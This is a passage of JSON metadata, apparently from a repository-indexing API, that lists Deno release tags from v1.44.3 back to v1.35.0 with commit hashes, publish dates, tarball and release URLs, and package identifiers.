544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit",